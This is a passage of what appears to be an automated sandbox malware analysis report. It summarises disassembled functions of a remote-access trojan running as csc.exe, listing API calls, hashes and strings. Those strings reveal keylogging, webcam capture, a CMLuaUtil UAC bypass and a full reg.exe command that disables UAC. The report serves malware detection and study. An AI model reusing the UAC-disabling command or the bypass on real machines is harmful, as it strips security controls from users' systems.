                                                                                                                                                                                        • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                                                                                                                                        • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                                                                                                                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0041B763
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                                                                                      • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                      • API String ID: 37874593-122982132
                                                                                                                                                                                      • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                                                                                                                                                                      • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                                                                                                                                      • int.LIBCPMT ref: 00411183
                                                                                                                                                                                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                                                                                                                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                      • String ID: (mG
                                                                                                                                                                                      • API String ID: 2536120697-4059303827
                                                                                                                                                                                      • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                                                                                                                      • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                                        • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                                                                                        • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                                                                                                                        • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                                                                                                                                                                      • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                                                                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                      • API String ID: 1866151309-2070987746
                                                                                                                                                                                      • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                                                                                                                                                                      • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                                                                                                                                                                      • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                      • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                                                                                      • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                                                                                                                                      • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe), ref: 004075D0
                                                                                                                                                                                        • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                                                                                                                                        • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00407629
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                      • API String ID: 3851391207-1898325914
                                                                                                                                                                                      • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                                                                                                                      • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-213444651
                                                                                                                                                                                      • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                                                                                      • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                                                                                                                                        • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: H_prologSleep
                                                                                                                                                                                      • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                                                      • API String ID: 3469354165-3054508432
                                                                                                                                                                                      • Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                                                                                                                                                                                      • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __cftoe
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4189289331-0
                                                                                                                                                                                      • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                                                                                                                                                                      • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                                                                                                                                                                      • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 1036877536-263838557
                                                                                                                                                                                      • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                                                      • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                                                                                                                      • _free.LIBCMT ref: 0044824C
                                                                                                                                                                                      • _free.LIBCMT ref: 00448274
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                      • _abort.LIBCMT ref: 00448293
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                      • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                                                                                                                      • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                                                                                                                                      • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 0-263838557
                                                                                                                                                                                      • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                                                                                      • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EventLocalTimewsprintf
                                                                                                                                                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                      • API String ID: 1497725170-248792730
                                                                                                                                                                                      • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                                                                                                                                                                      • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                                                                                                                      • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                                                                                                                      • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                      • String ID: XQG
                                                                                                                                                                                      • API String ID: 1958988193-3606453820
                                                                                                                                                                                      • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                                                                                                                                                                      • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                                                                                                                                      • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                                                                                                                                                                      • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041D580
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                      • String ID: 0$MsgWindowClass
                                                                                                                                                                                      • API String ID: 2877667751-2410386613
                                                                                                                                                                                      • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                                                                                      • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                                                                                                                                      • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                                                                                      • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                      • API String ID: 2922976086-4183131282
                                                                                                                                                                                      • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                                                                                      • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                                                                                      • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • SG, xrefs: 004076DA
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 004076C4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                      • API String ID: 0-2219448981
                                                                                                                                                                                      • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                                                                                                                                                                      • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                                                                                                                      • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0040512C
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                                                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                      • String ID: KeepAlive | Disabled
                                                                                                                                                                                      • API String ID: 2993684571-305739064
                                                                                                                                                                                      • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                                                                                                                                                                      • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                                                                                                                                      • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: GetCursorInfo$User32.dll$`Wu
                                                                                                                                                                                      • API String ID: 1646373207-4024354691
                                                                                                                                                                                      • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                                                                                                                                      • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                                                                                                                                                      Uniqueness

